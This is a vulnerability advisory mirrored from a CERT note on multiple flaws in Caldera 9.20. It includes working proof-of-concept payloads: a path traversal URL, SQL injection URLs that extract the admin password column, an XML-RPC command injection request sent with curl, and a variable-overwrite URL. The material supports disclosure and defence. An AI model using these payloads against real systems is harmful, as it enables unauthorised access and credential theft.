Executive Summary



This Alert is flagged as TOP 25 Common Weakness Enumeration from CWE/SANS. For more information, you can read this.
Summary
Title Caldera 9.20 contains multiple vulnerabilities
Informations
Name VU#693092 First vendor Publication 2014-05-07
Vendor VU-CERT Last vendor Modification 2014-05-07
Severity (Vendor) N/A Revision M

Security-Database Scoring CVSS v3

Cvss vector : N/A
Overall CVSS Score NA
Base Score NA Environmental Score NA
impact SubScore NA Temporal Score NA
Exploitabality Sub Score NA
 
Calculate full CVSS 3.0 Vectors scores

Security-Database Scoring CVSS v2

Cvss vector : (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cvss Base Score 10 Attack Range Network
Cvss Impact Score 10 Attack Complexity Low
Cvss Expoit Score 10 Authentication None Required
Calculate full CVSS 2.0 Vectors scores

Detail

Vulnerability Note VU#693092

Caldera 9.20 contains multiple vulnerabilities

Original Release date: 07 May 2014 | Last revised: 07 May 2014

Overview

Caldera 9.20, and possibly earlier versions, contains multiple vulnerabilities.

Description

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - CVE-2014-2933

Caldera 9.20 and possibly earlier versions contains a path traversal vulnerability due to the script '/dirmng/index.php' caused by improper limitation of a pathname to a restricted directory. An attacker can exploit this vulnerability to access arbitrary directories on the server's operating system.

Example:
/dirmng/index.php?PUBLIC=1&cdir=/

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - CVE-2014-2934
Caldera 9.20 and possibly earlier versions contains multiple script files that are vulnerable to a SQL injection due to improper neutralization of special elements used in an SQL command.

Examples:
/costview2/jobs.php?tr=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,pass_adm,14,15,16+from+cost_admin
/costview2/printers.php?id_onglet=0&tr=0+union+select+0x3020756E696F6E2073656C656374206E756C6C2C404076657273696F6E2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C,null,null,0,null&deb=0


CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') - CVE-2014-2935
Caldera CostView as part of Caldera 9.20 contains a vulnerability that allows an unauthenticated user the execution of OS commands.

The script '/costview3/xmlrpc_server/xmlrpc.php' is vulnerable to command execution due to improper neutralization of special elements used in an OS command. It can be triggered by submitting a specifically crafted PHP XMLRPC request by an unauthenticated remote user.

Example:
$ cat get_cutter_tools.xml
<?phpxml version="1.0"?>
<methodCall>
<methodName>xmlrpc.get_cutter_tools_xmlrpc</methodName>
<params>
<param><value><string>cutter_name</string></value></param>
<param><value><string>; echo
"&lt;CalderaInfo>&lt;methods>&lt;item>&lt;type>`id`&lt;/type>&lt;/item>&lt;/methods>&lt;/CalderaInfo
>"</string></value></param>
</params>
</methodCall>
$ curl --data @get_cutter_tools.xml http://<host>/costview3/xmlrpc_server/xmlrpc.php
<?phpxml version="1.0"?>
<methodResponse>
<params>
<param>
<value><struct>
<member><name>get_cutter_tools_xmlrpc</name>
<value><array>
<data>
<value><string>uid=1002(caldera) gid=1001(caldera)
groups=1001(caldera),4(adm),7(lp),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),46(plugdev),103
(fuse),104(scanner),109(netdev)</string></value>
</data>
</array></value>
</member>
</struct></value>
</param>
</params>
</methodResponse>



CWE-627 - Dynamic Variable Evaluation - CVE-2014-2936
Caldera 9.20 and possibly earlier versions contains a directory manager component of Caldera 9.20 that allows the manipulation of variables in the global scope. There are various scripts that are vulnerable to global variable scope injection:

* /PPD/index.php
* /dirmng/docmd.php
* /dirmng/index.php
* /dirmng/param.php


This can be exploited by overwriting defined variables with arbitrary values during script runtime. This can be used to enable the upload function to store code within the web root directory structure. This results in an arbitrary code execution on the server.

Example:
/dirmng/index.php?maindir_hotfolder=/var/www/caldera/html/

The CVSS score below was calculated for CVE-2014-2935.

Impact

An unauthenticated attacker could access arbitrary directories on the server's operating system, access arbitrary database data, execute OS commands, or manipulate global variables.

Solution

We are currently unaware of a practical solution to this problem.

Restrict Access

As a general good security practice, only allow connections from trusted hosts and networks.

Vendor Information (Learn More)

VendorStatusDate NotifiedDate Updated
CalderaAffected25 Mar 201407 May 2014
If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

GroupScoreVector
Base7.5AV:N/AC:L/Au:N/C:P/I:P/A:P
Temporal5.7E:U/RL:U/RC:UC
Environmental5.3CDP:LM/TD:M/CR:ND/IR:ND/AR:ND

References

  • http://www.caldera.com/product/version-9-20/
  • http://www.caldera.com/product/options/costview/

Credit

Thanks to Thomas Fischer and Markus Wulftange of Daimler TSS GmbH, Ulm, Germany for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

  • CVE IDs:CVE-2014-2933CVE-2014-2934CVE-2014-2935CVE-2014-2936
  • Date Public:07 May 2014
  • Date First Published:07 May 2014
  • Date Last Updated:07 May 2014
  • Document Revision:10

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Original Source

Url : http://www.kb.cert.org/vuls/id/693092

CWE : Common Weakness Enumeration

% Id Name
25 % CWE-94 Failure to Control Generation of Code ('Code Injection')
25 % CWE-89 Improper Sanitization of Special Elements used in an SQL Command ('SQL Injection') (CWE/SANS Top 25)
25 % CWE-78 Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection') (CWE/SANS Top 25)
25 % CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE/SANS Top 25)

CPE : Common Platform Enumeration

TypeDescriptionCount
Application 1

Nessus® Vulnerability Scanner

Date Description
2014-06-05 Name : The remote web server hosts a PHP script that allows arbitrary command execut...
File : caldera_9_20_cmd_injection.nasl - Type : ACT_ATTACK
2014-06-05 Name : The remote web server hosts a PHP script that is affected by a directory trav...
File : caldera_9_20_dir_traversal.nasl - Type : ACT_ATTACK

Alert History

If you want to see full details history, please login or register.
0
1
2
3
Date Informations
2014-06-06 13:28:15
  • Multiple Updates
2014-05-09 21:30:21
  • Multiple Updates
2014-05-08 17:26:22
  • Multiple Updates
2014-05-07 17:22:36
  • First insertion